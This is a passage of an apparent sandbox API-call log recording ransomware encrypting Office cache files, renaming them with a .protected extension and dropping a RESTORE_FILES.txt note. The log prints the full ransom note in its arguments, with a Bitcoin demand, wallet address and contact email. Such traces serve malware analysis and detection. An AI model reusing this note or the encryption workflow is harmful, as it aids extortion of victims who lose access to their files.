(lpFirst="AccessMUI.msi", lpSrch=".zip") returned 0x0 [0060.216] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 
[0060.521] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.521] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.540] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.540] CloseHandle (hObject=0x150) returned 1 [0060.540] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.protected") returned 103 [0060.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.protected")) returned 1 [0060.541] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Windows") 
returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Program Files") returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Program Files (x86)") returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="$Recycle.bin") returned 1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="System Volume Information") returned -1 [0060.541] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.541] StrStrIW (lpFirst="AccessMUI.xml", lpSrch=".protected") returned 0x0 [0060.541] lstrcmpW (lpString1="AccessMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.541] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".txt") returned 0x0 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".rar") returned 0x0 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".zip") returned 0x0 [0060.550] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x545, lpOverlapped=0x0) returned 1 [0060.561] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x545, lpOverlapped=0x0) returned 1 [0060.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.562] CloseHandle (hObject=0x150) returned 1 [0060.562] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.protected") returned 103 [0060.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.protected")) returned 1 [0060.563] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Windows") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Program Files") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Program Files (x86)") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="$Recycle.bin") returned 1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="System Volume Information") returned -1 [0060.563] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.563] StrStrIW (lpFirst="AccLR.cab", lpSrch=".protected") returned 0x0 [0060.563] lstrcmpW (lpString1="AccLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0060.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.563] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 
[0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".txt") returned 0x0 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".rar") returned 0x0 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".zip") returned 0x0 [0060.573] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.606] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.606] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.761] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.761] CloseHandle (hObject=0x150) returned 1 [0060.761] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.protected") 
returned 99 [0060.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.protected")) returned 1 [0060.762] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files (x86)") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0060.762] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.762] StrStrIW (lpFirst="branding.xml", lpSrch=".protected") returned 0x0 [0060.762] lstrcmpW (lpString1="branding.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.762] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.762] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.762] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all 
users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.763] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.763] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0060.764] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.764] StrStrW (lpFirst="branding.xml", lpSrch=".rar") returned 0x0 [0060.764] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.764] StrStrW (lpFirst="branding.xml", lpSrch=".zip") returned 0x0 [0060.764] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.879] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.879] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.880] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.880] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.889] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.889] CloseHandle (hObject=0x150) returned 1 [0060.890] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.protected") returned 102 [0060.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.protected")) returned 1 [0060.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0060.890] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0060.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\RESTORE_FILES.txt") returned 97 [0060.890] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.891] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0060.891] lstrlenA (lpString="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") returned 684 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0060.891] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0060.891] CloseHandle (hObject=0xb4) returned 1 [0060.892] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Windows") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Program Files") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Program Files (x86)") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="$Recycle.bin") returned 1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="System Volume Information") returned -1 [0060.892] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".protected") returned 0x0 [0060.892] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="RESTORE_FILES.txt") returned -1 [0060.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.892] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all 
users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".txt") returned 0x0 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".rar") returned 0x0 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".zip") returned 0x0 [0060.892] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0060.916] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.916] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0060.917] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.917] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.922] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.922] CloseHandle (hObject=0xb4) returned 1 [0060.923] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.protected") returned 93 [0060.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.protected")) returned 1 [0060.923] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.923] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Windows") returned -1 [0060.923] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Program Files") returned -1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Program Files (x86)") returned -1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="$Recycle.bin") returned 1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="System Volume Information") returned -1 [0060.924] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".protected") returned 0x0 [0060.924] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.924] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.924] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.924] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".txt") returned 0x0 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".rar") returned 0x0 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".zip") returned 0x0 [0060.924] ReadFile (in: hFile=0xb4, lpBuffer=0x48ca20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesRead=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0060.937] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x48ca20*, 